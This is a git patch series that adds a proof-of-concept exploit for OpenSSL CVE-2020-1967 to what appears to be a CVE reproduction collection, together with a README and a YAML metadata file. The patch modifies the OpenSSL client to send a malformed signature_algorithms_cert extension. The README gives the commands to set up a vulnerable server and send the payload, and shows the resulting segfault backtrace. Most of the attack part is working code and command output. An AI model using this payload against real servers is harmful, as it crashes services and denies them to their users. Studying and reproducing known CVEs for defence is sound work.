From 59f80cd582f10cf2aa155fc0dd628242888ec797 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A5=BD=E5=90=8D=E5=AD=97?= Date: Sat, 15 Apr 2023 08:14:51 +0000 Subject: [PATCH 1/2] CVE-2020-1967 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 好名字 --- .../2020/CVE-2020-1967/CVE-2020-1967.patch | 34 +++++++ cve/openssl/2020/CVE-2020-1967/README.md | 89 +++++++++++++++++++ cve/openssl/2020/yaml/CVE-2020-1967.yaml | 20 +++++ 3 files changed, 143 insertions(+) create mode 100644 cve/openssl/2020/CVE-2020-1967/CVE-2020-1967.patch create mode 100644 cve/openssl/2020/CVE-2020-1967/README.md create mode 100644 cve/openssl/2020/yaml/CVE-2020-1967.yaml diff --git a/cve/openssl/2020/CVE-2020-1967/CVE-2020-1967.patch b/cve/openssl/2020/CVE-2020-1967/CVE-2020-1967.patch new file mode 100644 index 00000000..b2605a5a --- /dev/null +++ b/cve/openssl/2020/CVE-2020-1967/CVE-2020-1967.patch @@ -0,0 +1,34 @@ +*** openssl-1.1.1d/ssl/statem/extensions_clnt.c Tue Sep 10 13:13:07 2019 +--- openssl-1.1.1d-patched/ssl/statem/extensions_clnt.c Tue Apr 28 21:11:20 2020 +*************** EXT_RETURN tls_construct_ctos_sig_algs(S +*** 272,277 **** +--- 272,300 ---- + return EXT_RETURN_NOT_SENT; + + salglen = tls12_get_psigalgs(s, 1, &salg); ++ ++ ++ /* ++ // signature_algorithms_cert ++ */ ++ const uint16_t non_existent = 0x1234; ++ fprintf(stderr,"Sending CVE-2020-1967 payload\n"); ++ if (!WPACKET_put_bytes_u16(pkt, TLSEXT_TYPE_signature_algorithms_cert) ++ // Sub-packet for sig-algs extension ++ || !WPACKET_start_sub_packet_u16(pkt) ++ // Sub-packet for the actual list ++ || !WPACKET_start_sub_packet_u16(pkt) ++ || (!WPACKET_put_bytes_u16(pkt, non_existent)) ++ || !WPACKET_close(pkt) ++ || !WPACKET_close(pkt)) { ++ SSLfatal(s, SSL_AD_INTERNAL_ERROR, SSL_F_TLS_CONSTRUCT_CTOS_SIG_ALGS, ++ ERR_R_INTERNAL_ERROR); ++ return EXT_RETURN_FAIL; ++ } ++ ++ /* ++ // original signature_algorithms: ++ */ + if (!WPACKET_put_bytes_u16(pkt, TLSEXT_TYPE_signature_algorithms) + /* Sub-packet for sig-algs extension */ + || !WPACKET_start_sub_packet_u16(pkt) \ No newline at end of file diff --git a/cve/openssl/2020/CVE-2020-1967/README.md b/cve/openssl/2020/CVE-2020-1967/README.md new file mode 100644 index 00000000..180c7589 --- /dev/null +++ b/cve/openssl/2020/CVE-2020-1967/README.md @@ -0,0 +1,89 @@ +# CVE-2020-1967 +Proof of concept exploit about OpenSSL signature_algorithms_cert DoS flaw (CVE-2020-1967). Credit for the original finding to Bernd Edlinger, additional analysis by Matt Caswell and Benjamin Kaduk, this demo by Imre Rad. + +## Prerequisite + +Server or client applications that call the `SSL_check_chain()` function during or after a TLS 1.3 handshake. According to the documentation, `SSL_check_chain()` checks whether certificate x, private key pk and certificate chain chain is suitable for use with the current session s. This function call is NOT present in the popular Apache httpd or Nginx projects. + +## Demo + +To exploit this vulnerability, a crafted signature_algorithms_cert TLS extension needs to be submitted as part of the Hello message. I used a patched version of the openssl library to build such a client; the server is the built-in s_server openssl app, along with the -x options to activate the code path that invokes `SSL_check_chain`. + +Setting up the server on a Debian stable (using the vulnerable version explicitly): + +``` +root@489def7f3594:/data# apt install libssl1.1=1.1.1d-0+deb10u2 openssl=1.1.1d-0+deb10u2 +... + +root@489def7f3594:/data# openssl version +OpenSSL 1.1.1d 10 Sep 2019 + +root@489def7f3594:/data# openssl s_server -cert cert.pem -key key.pem -accept 8443 -verify 1 -tls1_3 -xkey key.pem -xcert cert.pem -xchain cert.pem +verify depth is 1 +Using default temp DH parameters +ACCEPT +``` + +Sending the payload using the patched client: + +``` +root@489def7f3594:/data# /path/to/patched/openssl s_client -connect 127.0.0.1:8443 -tls1_3 -cert cert.pem -key key.pem -sigalgs rsa_pss_rsae_sha256 +CONNECTED(00000004) +Sending CVE-2020-1967 payload +... +``` + +And the server is supposed to segfault at this point. The core looks like this: +``` +root@489def7f3594:/data/1# gdb /data/openssl-1.1.1d/apps/openssl core +GNU gdb (Ubuntu 9.1-0ubuntu1) 9.1 +Copyright (C) 2020 Free Software Foundation, Inc. +License GPLv3+: GNU GPL version 3 or later +This is free software: you are free to change and redistribute it. +There is NO WARRANTY, to the extent permitted by law. +Type "show copying" and "show warranty" for details. +This GDB was configured as "x86_64-linux-gnu". +Type "show configuration" for configuration details. +For bug reporting instructions, please see: +. +Find the GDB manual and other documentation resources online at: + . + +For help, type "help". +Type "apropos word" to search for commands related to "word"... +Reading symbols from /data/openssl-1.1.1d/apps/openssl... +(No debugging symbols found in /data/openssl-1.1.1d/apps/openssl) +[New LWP 26319] +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". +Core was generated by `/data/openssl-1.1.1d/apps/openssl s_server -cert cert.pem -key key.pem -accept'. +Program terminated with signal SIGSEGV, Segmentation fault. +#0 0x00007f09bcff3770 in tls1_check_sig_alg.part.0.cold () from /data/openssl-1.1.1d/libssl.so +(gdb) bt +#0 0x00007f09bcff3770 in tls1_check_sig_alg.part.0.cold () from /data/openssl-1.1.1d/libssl.so +#1 0x00007f09bd03f309 in tls1_check_chain () from /data/openssl-1.1.1d/libssl.so +#2 0x00007f09bd403fc8 in set_cert_cb () +#3 0x00007f09bd037f75 in tls_post_process_client_hello () from /data/openssl-1.1.1d/libssl.so +#4 0x00007f09bd02703f in state_machine.part () from /data/openssl-1.1.1d/libssl.so +#5 0x00007f09bcffa3f8 in ssl3_write_bytes () from /data/openssl-1.1.1d/libssl.so +#6 0x00007f09bd00fbb9 in ssl_write_internal () from /data/openssl-1.1.1d/libssl.so +#7 0x00007f09bd00fd07 in SSL_write () from /data/openssl-1.1.1d/libssl.so +#8 0x00007f09bd3e337d in sv_body () +#9 0x00007f09bd40757a in do_server () +#10 0x00007f09bd3e7c27 in s_server_main () +#11 0x00007f09bd3cea46 in do_cmd () +#12 0x00007f09bd3b89fd in main () +``` + +## Affected versions + +Affected versions are: OpenSSL 1.1.1d, 1.1.1e, and 1.1.1f. +The first fixed version is OpenSSL 1.1.1g. + +## References + +- https://www.openssl.org/news/secadv/20200421.txt + +- https://github.com/openssl/openssl/issues/11500 + +- https://github.com/openssl/openssl/commit/a87f3fe01a5a894aa27ccd6a239155fd129988e4 diff --git a/cve/openssl/2020/yaml/CVE-2020-1967.yaml b/cve/openssl/2020/yaml/CVE-2020-1967.yaml new file mode 100644 index 00000000..d6a4d700 --- /dev/null +++ b/cve/openssl/2020/yaml/CVE-2020-1967.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-1967 +source: + https://github.com/irsl/CVE-2020-1967 +info: + name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 + severity: high + description: | + 在 TLS 1.3 握手期间或之后调用 SSL_check_chain() 函数的服务器或客户端应用程序可能会由于不正确处理“signature_algorithms_cert”TLS 扩展而导致 NULL 指针取消引用而崩溃。如果从对等方收到无效或无法识别的签名算法,则会发生崩溃。恶意对等方可利用此漏洞进行拒绝服务攻击。 + scope-of-influence: + OpenSSL 1.1.1d 到 1.1.1f + reference: + - https://nvd.nist.gov/vuln/detail/cve-2020-1967 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H + cvss-score: 7.5 + cve-id: CVE-2020-1967 + cwe-id: CWE-476 + cnvd-id: None + kve-id: None + tags: 拒绝服务,DoS \ No newline at end of file -- Gitee From a65f980d896d8ff34a52c66b5a1af079f8fb5792 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A5=BD=E5=90=8D=E5=AD=97?= Date: Sat, 15 Apr 2023 08:23:16 +0000 Subject: [PATCH 2/2] CVE-2020-1967 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 好名字 --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index a39bab91..8788f632 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -142,6 +142,7 @@ cve: - CVE-2022-0778 - CVE-2022-3786 - CVE-2016-2107 + - CVE-2020-1967 joomla: - CVE-2023-23752 libxml2: -- Gitee